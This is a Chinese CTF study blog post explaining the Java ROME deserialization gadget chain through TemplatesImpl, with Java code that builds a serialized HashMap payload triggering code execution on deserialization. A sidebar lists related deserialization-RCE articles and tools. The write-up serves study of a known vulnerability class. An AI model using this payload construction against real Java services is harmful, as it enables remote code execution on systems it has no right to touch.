Rome反序列化

最新推荐文章于 2023-01-30 22:27:33 发布
最新推荐文章于 2023-01-30 22:27:33 发布
阅读量710 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122641282
版权

Rome反序列化

Gadget

/*
 * Gadget:
 *   HashMap#readObject
 *     ObjectBean#hashCode
 *       EqualsBean#beanHashCode
 *         ToStringBean#toString
 *           TemplatesImpl#getOutputProperties
 * */

HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 ObjectBean#hashCode

ObjectBean#hashCode 方法调用 beanHashCode 方法,属性类型为 EqualsBean,即、调用 EqualsBean#beanHashCode 方法

image-20220121222047540

EqualsBean#beanHashCode 方法调用任意类的 toString 方法

image-20220121222229994

这里调用 ToStringBean#toString 方法,直接来到有参的 toString 方法

image-20220121222340116

getPropertyDescriptors 获取类所有的 setter/getter 方法

image-20220121222504964

然后遍历获取到的所有方法,如果是无参的方法则执行

image-20220121222600125

那么这里可以构造使其调用到 TemplatesImpl#getOutputProperties 方法

构造 payload ,这里注意使用 Templates 接口,这样就只获取到 getOutputProperties 这一个方法进行执行,如果使用 TemplatesImpl 方法则获取到多个 setter/getter ,可能执行某个方法途中报错直接程序终止了

public class ROME {

    public static byte[] getSerializeData() throws Exception{
        TemplatesImpl templatesImpl = CreateTemplatesImpl.createTemplatesImpl();
        // 这里使用 Templates 接口,只获取 getOutputProperties 方法,如果使用 TemplatesImpl.class 则会有比较多的方法,可能会在调用其它方法时出错而无法继续往下
        ToStringBean toStringBean = new ToStringBean(Templates.class,templatesImpl);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
        // 先用 String.class 占位,这样不至于在 HashMap.put 的时候触发命令执行
        ObjectBean objectBean = new ObjectBean(String.class,"ky");
        HashMap hashMap = new HashMap();
        hashMap.put(objectBean,1);
        Reflect.reflectSetField(objectBean,"_equalsBean",equalsBean);
        byte[] serialize = SerWithUnSer.serialize(hashMap);
        return serialize;
    }

    public static void main(String[] args) throws Exception{
        ParseArgs.parseArgs(args);
        byte[] bytes = getSerializeData();
        SerWithUnSer.unSerialize(bytes);
    }
}
0x6b79
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ROME反序列化分析
qq_53263789的博客
03-29 643
title: ROME反序列化 categories: java反序列化 Rome Rome 就是为 RSS聚合开发的框架, 可以提供RSS阅读和发布器。 Rome 提供了 ToStringBean 这个类,提供深入的 toString 方法对JavaBean进行操作 Calc package bytecode; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xs.
[Java反序列化]—Rome反序列化
最新发布
Sentiment的博客
04-28 485
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
ROME反序列化-TemplatesImpl链子
chenxiaoyinaida的博客
11-10 403
前言: ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。 正题: 这个链子是通过HashMap调用ObjectBean的hashCode()方法来完成RCE。 这里放一下链子会用到的一些必要代码,接下来进行相应的调试 public int hashCode() { return this._equalsBean.beanHashCode(); } 当调用hashCode之后会调用beanHashCode(),..
[Java反序列化]rome反序列化学习
feng的博客
11-09 1272
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
Javaweb安全——反序列化漏洞-Rome
weixin_43610673的博客
01-30 354
核心是 ToStringBean#toString()会调用其封装类的所有无参 getter方法
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
S24-C3P0反序列化1
08-03
S24-C3P0反序列化攻击的原理是利用C3P0和ROME反序列化机制,结合fastjson的反序列化漏洞,实现远程代码执行的攻击。该攻击方法需要攻击者精心构造恶意payload,并将其传输到目标服务器,实现远程代码执行。 在...
android XML文件解析和序列化 demo
09-23
2. **Gson**: 虽然Gson主要用于JSON序列化和反序列化,但通过扩展,也可以处理XML。首先将对象转换为JSON,然后使用像`javax.xml.transform.Transformer`这样的工具将JSON转换为XML。 3. **JAXB (Java Architecture...
[Timeline Sec] - CVE-2020-1948:Dubbo Provider默认反序列化复现1
08-03
然而,2020年,腾讯安全团队发现了一个重要的安全漏洞,即CVE-2020-1948,这是一个Dubbo Provider默认反序列化远程代码执行漏洞。攻击者可以构造恶意请求,导致任意代码被执行。 **漏洞细节** 在受影响的Dubbo版本...
rome源码包和jar包
01-04
- Rome设计为模块化,可以通过添加自定义解析器和生成器来处理特定格式的feed。 - 支持JAXB(Java Architecture for XML Binding),可以将feed对象序列化为XML,反之亦然。 5. **Rome与XML解析** - Rome库底层...
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3423
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
Java安全』反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析
Ho1aAs‘s Blog
03-08 1895
文章目录前言版本代码审计 | 原理分析1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()手动调用ToStringBean.toString()示例代码2. EqualsBean.hashCode()触发toString()手动调用EqualsBean.hashCode()示例代码3. ObjectBean触发toString()或hashCode()手动调用ObjectBean.toString()和hashCode()示例代码4.
序列化和反序列化案例
weixin_40964170的博客
05-02 210
序列化:将java对象转化为可传输的字节数组 反序列化:将字节数组还原为java对象 为啥子要序列化? 序列化最终的目的是为了对象可以跨平台存储,和进行网络传输。而我们进行跨平台存储和网络传输的方式就是IO,而我们的IO支持的数据格式就是字节数组 什么情况下需要序列化? 凡是需要进行跨平台存储和网络传输的数据,都需要进行序列化 本质上存储和网络传输 都需要经过 把一个对象状态保存成一种跨平台识别的字节格式,然后其他的平台才可以通过字节信息解析还原对象信息 序列化的方式 序列化只是一种拆装组装对象的规则,这种
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4114
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
反序列化工具_Hessian反序列化RCE漏洞复现及分析
weixin_40003512的博客
12-02 1411
Hessian是一个轻量级的RPC框架。它基于HTTP协议传输,使用Hessian二进制序列化,对于数据包比较大的情况比较友好。Hessian反序列化类似Java反序列化,可导致RCE,POC好像2017年就公开了,但是最新版本hessian-4.0.60.jar,经过测试也存在反序列化RCE问题。使用marshalsec项目工具(https://github.com/mbechler/...
Java对象的序列化与反序列化
Rome was not built in one day
03-03 508
转自:http://www.hollischuang.com/archives/1150 序列化与反序列化 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。一般将一个对象存储至一个储存媒介,例如档案或是记亿体缓冲等。在网络传输过程中,可以是字节或是XML等格式。而字节的或XML编码格式可以还原完全相等的对象。这个相反的过程又称为反序
从一道题看java反序列化和回显获取
Chenhui98的博客
08-11 195
回到getTransletInstance,可以发现此时会实力话我们注入的恶意类,同时会强制类型转换成AbstractTranslet类型,这两处也是为什么我们需要将我们的恶意类继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,不然无法触发此处构造函数。...
Hessian 反序列化及相关利用链
晓得哥的博客
02-29 2326
作者:Longofo@知道创宇404实验室 时间:2020年2月20日 原文地址:https://paper.seebug.org/1131/#_2 前不久有一个关于Apache Dubbo Http反序列化的漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apa...
hessian序列化_dubbo provider 反序列化rce及补丁绕过
weixin_32734143的博客
01-20 211
01漏洞复现代码地址:https://github.com/hex0wn/learn-java-bug/tree/master/dubbo-poc环境:dubbo 2.7.6 + java 8u151 + rome 1.7.0下载测试代码,直接启动 provider开启jndi监听 https://github.com/welk1n/JNDI-Injection-Exploitjava ...
rmi反序列化导致rce漏洞修复_ADOBE ColdFusion Java RMI 反序列化 RCE 漏洞详情(CVE-2018-4939)...
weixin_39883208的博客
12-31 208
前言2017年10月我发布了一个Java RMI/反序列化漏洞的概述和PoC视频,该漏洞影响了AdobeColdFusion的Flex集成服务。我推迟发布所有细节和利用方法,因为发现了一个额外的可用于修复服务器的payload。Adobe现在已经发布了进一步的安全更新,可以点击链接了解更多详细信息。RMI和java.lang.ObjectJava远程方法调用(RMI)协议几乎是100%J...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值